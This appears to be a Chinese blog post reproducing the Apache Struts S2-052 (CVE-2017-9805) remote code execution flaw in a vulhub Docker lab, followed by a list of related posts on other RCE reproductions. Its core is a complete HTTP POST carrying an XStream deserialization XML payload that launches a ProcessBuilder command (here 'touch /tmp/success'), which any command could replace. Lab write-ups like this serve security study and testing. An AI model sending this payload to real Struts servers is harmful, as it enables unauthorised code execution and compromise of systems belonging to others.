S2-052（CVE-2017-9805）遠端程式碼執行漏洞復現

阿新 • • 發佈：2020-07-31

0x01 漏洞說明

漏洞編號：CVE-2017-9805（S2-052）
影響版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12
漏洞詳情：http://struts.apache.org/docs/s2-052.html

0x02 環境搭建

使用vulhub搭建漏洞環境

/vulhub-master/struts2/s2-052

http://192.168.255.130:8080/orders.xhtml

0x03 漏洞復現

傳送以下資料包

POST /orders/3 HTTP/1.1
Host: 192.168.255.130:8080
Content-Length: 2415 

Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.255.130:8080
Content-Type: application/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/* 
;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.255.130:8080/orders/3/edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=2B334B141F6EEA52ED87210EA8B57CAA
Connection: close

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>touch</string>
                        <string>/tmp/success</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>

注意將Content-Type改成application/xml

返回包如下：

說明利用成功，會在docker容器內建立檔案/tmp/success，執行

docker exec -it 容器id bash
ls /tmp/

即可看到。

參考文章：https://blog.csdn.net/qq_29647709/article/details/84954575

S2-052（CVE-2017-9805）遠端程式碼執行漏洞復現

0x01 漏洞說明漏洞編號：CVE-2017-9805（S2-052）影響版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12漏洞詳情：http://struts.apache.org/docs/s2-052.html

CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

CVE-2020-14645Weblogic遠端程式碼執行漏洞復現漏洞介紹今日，Oracle官方釋出WebLogic安全更新，其中修復了一個CVSS評分為9.8的嚴重漏洞(CVE-2020-14645)，該漏洞通過T3協議進行利用，攻擊者可以實現遠端程式碼執行

Jenkins-CI 遠端程式碼執行漏洞復現（CVE-2017-1000353）

0x01 環境使用vulhub搭建漏洞環境 /vulhub-master/jenkins/CVE-2017-1000353 http://192.168.255.130:8080/

F5 BIG-IP 遠端程式碼執行漏洞復現（CVE-2020-5902）

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

[CVE-2012-0392] Apache Struts 2遠端程式碼執行漏洞復現（第五彈）

棄之可惜 0x00 漏洞概述編號為CVE-2012-0392。即S2-008，實際上是多個漏洞的集合。

Jackson遠端程式碼執行漏洞復現（不使用vluhub，手寫transletBytecodes欄位）

今天花了一天的時間復現Jackson遠端程式碼執行漏洞，查詢vulhub可以看到存在CVE-2017-7525的漏洞環境，根據網上的教程，的確可以復現成功。

Apache Struts 2遠端程式碼執行漏洞復現（第三彈）

Double Kill 0x00 漏洞概述編號為CVE-2017-5638。官方描述是： It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn\'t valid an exception is th

Apache Struts 2遠端程式碼執行漏洞復現（第二彈）

即S2-048 0x00 漏洞概述編號為CVE-2017-9791。官方描述是： It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it\'s a Struts 1 action

漏洞復現-CVE-2017-7525-Jackson遠端程式碼執行

0x00 實驗環境攻擊機：Win 10 靶場：docker拉的vulhub靶場 0x01 影響版本 FasterXML Jackson-databind < 2.6.7.1FasterXML Jackson-databind < 2.7.9.1FasterXML Jackson-databind < 2.8.9

Office CVE-2017-8570遠端程式碼執行漏洞復現

CVE-2017-8570漏洞是一個邏輯漏洞，利用方法簡單，影響範圍廣。由於該漏洞和三年前的SandWorm（沙蟲）漏洞非常類似，因此我們稱之為“沙蟲”二代漏洞。

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

CVE-2020-0674 IE遠端程式碼執行漏洞

0x00 漏洞描述該漏洞影響元件為jscript.dll，該動態連結庫是微軟Internet Explorer瀏覽器的Javascript引擎之一，其中IE8及以下使用jscript.dll，IE9及以上預設使用jscript9.dll，但網頁可以通過《script》標籤指定

Apache Struts2 S2-013遠端程式碼執行漏洞復現

墨者學院開的靶場進入環境 Struts2-013好傢伙，框架直接寫臉上，怕人看不出來= =

ThinkPHP（5.0.23-rce）任意程式碼執行漏洞復現及原理

漏洞詳情：攻擊者可向快取檔案內寫入PHP程式碼，導致遠端程式碼執行。根據漏洞利用能得出通過s引數傳遞具體的路由。參考http://blog.nsfocus.net/thinkphp-full-version-rce-vulnerability-analysis/?tdsourcetag=s

Spring Cloud Gateway 遠端程式碼執行漏洞復現CVE-2022-22947

漏洞說明 2022年3月1日，VMware官方釋出漏洞報告，在使用Spring Colud Gateway的應用程式開啟、暴露Gateway Actuator端點時，會容易造成程式碼注入攻擊，攻擊者可以製造惡意請求，在遠端主機進行任意遠端執行。

Spring Framework遠端程式碼執行漏洞復現(CVE-2022-22965)

1.漏洞描述漏洞名稱 Spring Framework遠端程式碼執行漏洞公開時間 2022-03-29 更新時間

CVE-2022-22947 Spring Cloud Gateway 遠端程式碼執行漏洞復現

一、漏洞概述 2022年3月1日，VMware官方釋出漏洞報告，在使用Spring Colud Gateway的應用程式開啟、暴露Gateway Actuator端點時，會容易造成程式碼注入攻擊，攻擊者可以製造惡意請求，在遠端主機進行任意遠端執行。

Joomla-3.4.6遠端程式碼執行漏洞復現

#01 Joomla簡介 Joomla!是一套自由、開放原始碼的內容管理系統，以PHP撰寫，用於釋出內容在全球資訊網與內部網，通常被用來搭建商業網站、個人部落格、資訊管理系統、Web 服務等，還可以進行二次開發以擴充使用範圍。

Apache Struts 2遠端程式碼執行漏洞復現

沒學會的SSH = Struts2 + Spring + Hibernate Apache Struts 2是一個基於MVC模式的Web應用框架，本質上相當於一個servlet。在MVC設計模式中，Struts 2作為控制器建立模型和檢視的資料互動。

Drupal遠端程式碼執行漏洞復現

最好的CMS之一 0x00 漏洞概述編號為CVE-2018-7600。 Drupal是用PHP開發的開源內容管理框架（CMF），由內容管理系統（CMS）和PHP開發框架（Framework）共同組成。

S2-052（CVE-2017-9805） 遠端程式碼執行漏洞復現

0x01 漏洞說明

0x02 環境搭建

0x03 漏洞復現

相關推薦

S2-052（CVE-2017-9805）遠端程式碼執行漏洞復現